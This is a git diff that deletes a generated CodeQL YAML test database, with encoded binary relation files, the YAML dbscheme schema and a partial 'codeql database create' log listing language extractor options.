zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly 
zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi diff --git a/ql/lib/test-db/db-yaml/default/pools/poolInfo b/ql/lib/test-db/db-yaml/default/pools/poolInfo deleted file mode 100644 index 6a51696b7cb94b49cb29a40c8f1618c418c97763..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 32 YcmZQz00Sl<$q2;mP#P?#`{RfV019gYQ2+n{ diff --git a/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel b/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel deleted file mode 100644 index 720d64f4baafc33efdf971f02084aca5f25b34a5..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4 LcmZQzU|<9Q00jU7 diff --git a/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum b/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum deleted file mode 100644 index c7704aa3482aaf78913dfb092fa6012f2e14e373..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf-vXzT>u200u%rM diff --git a/ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 b/ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 deleted file mode 100644 index c44d5f88d6c4629a84a90da758cdadf0ed87e804..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIufeipK2m&y5|Np!%OfcmEpjASE009C72oNAZU|(SND^EAR)9-T6b?$V_2@oJa UfB*pk1PBlyK!5-N0t5mDKAHFc2LJ#7 
diff --git a/ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 b/ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 deleted file mode 100644 index 42938ceef8f891f706d4353febf3984dc4886b15..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIuArXL36hzV201J``bRfqsfWpv)!6L|qK(n+!oSnI|{!~@<>70-I`ysXU+Nb=O to^9!JMt}eT0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PJ_C;00da2L}KE 
diff --git a/ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 b/ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 deleted file mode 100644 index e312329da67e9cd0ca5fea26c379f7b94f230b77..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuu?>JA07Owoq0|C)vY;?QNB|SZcLANickRzLFW<)u{i-9j8d6FjmVM?ibDg=r zhL1y7YwPD;w#5h#AV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF 
z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs 
z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly KK!5;&p9?&Xo*VA~ diff --git a/ql/lib/test-db/db-yaml/default/yaml.rel b/ql/lib/test-db/db-yaml/default/yaml.rel deleted file mode 100644 index 5f848073652e137ce970cd362a76f858865fd7c4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1416 zcmYk6>q{455QW$Bn`LHcR(98vQVOlq?%IVA2}L5JPhv=fh-gIgw|9G<-90b|4)c4@ z46|ou-~BaBGt@NA01Phh<1IYZ3(0%-_i*%opg*4`jzlM(==C$iQE2}m%KsAW{|26e zB6<7TV+>k9+V{8qF&u{?dF#)@2}Lkg{MhqSt9JGA<1;6r{jHB5dt8AcdHbJ-*A&5I z>93cYt=jcJ$#3f~!YSzU?Ei3ggrM`dor*P$VCpuRFO}Ek50)cU@RteZFf| z^y2d_+InQ2+M-P1L`;+=3!`>)p?`BG@eceTN@fwX2W+ z`)D7d7yk=rpQ01v-<^MsUi?2q+v#<`sq}xs?_H>Wzth||-|ZJDlGnfA>7F9kE&lEK zwN<yX~>pJ_p=! z&>@E%anv!#jX2??Q%*bMtaENV?}Cdix$KIouDR}pn{K)9frtKhZy$^o-=$B7E`{Ju_zWd?lKP`VC3IG5A diff --git a/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum deleted file mode 100644 index 9fc567e5c0691ecfc1890d2dc38b0fa83b5e39ea..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf<~j}b^ruC0lxqM 
diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index 573ab48b75431cf7a24d52077aa8a0371ccb9604..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 552 zcmXZZT}whi7)9Z^Pt&Z#N)6J?Oe;}D{K$-m5D_Fqq^m$eM8u1b@YlO{tphLX;h;0l z7($4I|K~tC#8EYlW9l*XyCgnRQ#hfXV}CY-Pt;3%s$StUwSfJ-BEC>dIIUK&*L%QO zwT``B1LxEx&Z{kat#+{YdcxlS1$&)We5<};uk()Y)B*N7LtIuz*uQy6PT_`T2frSa3&%>NXE@BAD4&KKC{TjH*|!anO7`@h>@-~SKx8MnBn K{^DnKhx>avaT2`% diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum deleted file mode 100644 index 7aae4dc38a0fef1277b98a50776a547dd54eafc3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf(z-A{{aQN0#N_} diff --git a/ql/lib/test-db/db-yaml/yaml.dbscheme b/ql/lib/test-db/db-yaml/yaml.dbscheme deleted file mode 100755 index 20d83c71ee6..00000000000 --- a/ql/lib/test-db/db-yaml/yaml.dbscheme +++ /dev/null 
@@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); 
diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/ql/lib/test-db/log/database-create-20240203.101754.571.log b/ql/lib/test-db/log/database-create-20240203.101754.571.log
deleted file mode 100644
index 8c7f3e173b7..00000000000
--- a/ql/lib/test-db/log/database-create-20240203.101754.571.log
+++ /dev/null
@@ -1,275 +0,0 @@ -[2024-02-03 10:17:54] This is codeql database create ql/lib/test-db -l yaml -s ql/lib/test -[2024-02-03 10:17:54] Log file was started late. -[2024-02-03 10:17:54] [PROGRESS] database create> Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. -[2024-02-03 10:17:54] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:54] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-02-03 10:17:54] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. 
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. 
-[2024-02-03 10:17:54] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). 
The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" - } - ], - "yaml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files 
written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. 
